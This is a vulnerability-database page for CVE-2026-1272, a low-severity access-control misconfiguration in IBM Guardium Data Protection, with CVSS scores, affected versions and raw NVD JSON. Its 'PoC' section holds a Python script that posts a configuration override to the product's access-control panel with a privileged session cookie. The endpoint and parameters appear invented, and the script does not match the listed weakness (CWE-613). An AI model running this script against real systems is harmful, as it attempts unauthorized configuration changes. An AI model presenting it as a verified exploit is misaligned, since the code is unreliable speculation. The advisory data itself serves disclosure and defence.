Security Vulnerability Report
中文
CVE-2026-1272 CVSS 2.7 LOW

CVE-2026-1272

Published: 2026-04-23 00:16:44
Last Modified: 2026-04-27 18:23:49

Description

IBM Guardium Data Protection 12.0, 12.1, and 12.2 is vulnerable to Security Misconfiguration vulnerability in the user access control panel.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:guardium_data_protection:12.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:guardium_data_protection:12.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:guardium_data_protection:12.2:*:*:*:*:*:*:* - VULNERABLE
IBM Guardium Data Protection 12.0
IBM Guardium Data Protection 12.1
IBM Guardium Data Protection 12.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-1272 PoC Concept # This script demonstrates checking for the security misconfiguration # in the IBM Guardium Data Protection user access control panel. # Note: High privileges (PR:H) are required to exploit this vulnerability. target_url = "https://<target-ip>:<port>/guardium/access_control/panel" session_cookie = "<valid_high_privilege_session_id>" # Requires Admin/High Privilege session headers = { "Cookie": f"JSESSIONID={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } # Payload attempting to modify a configuration setting that should be restricted payload = { "action": "update_config", "parameter": "access_control_list", "value": "malicious_override_value" } try: response = requests.post(target_url, data=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") if "success" in response.text or "configuration updated" in response.text.lower(): print("[+] Potential Security Misconfiguration detected: Settings modified.") else: print("[-] Settings modification returned unexpected response.") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1272", "sourceIdentifier": "[email protected]", "published": "2026-04-23T00:16:44.407", "lastModified": "2026-04-27T18:23:48.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Guardium Data Protection 12.0, 12.1, and 12.2 is vulnerable to Security Misconfiguration vulnerability in the user access control panel."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:guardium_data_protection:12.0:*:*:*:*:*:*:*", "matchCriteriaId": "44547892-7BC2-4158-90F2-1399EB1A9DE7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:guardium_data_protection:12.1:*:*:*:*:*:*:*", "matchCriteriaId": "EADF2641-F8DF-4986-8106-287C615DE19D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:guardium_data_protection:12.2:*:*:*:*:*:*:*", "matchCriteriaId": "CBA75153-5681-40C8-8EB4-236EF2EC8A4B"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7269445", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}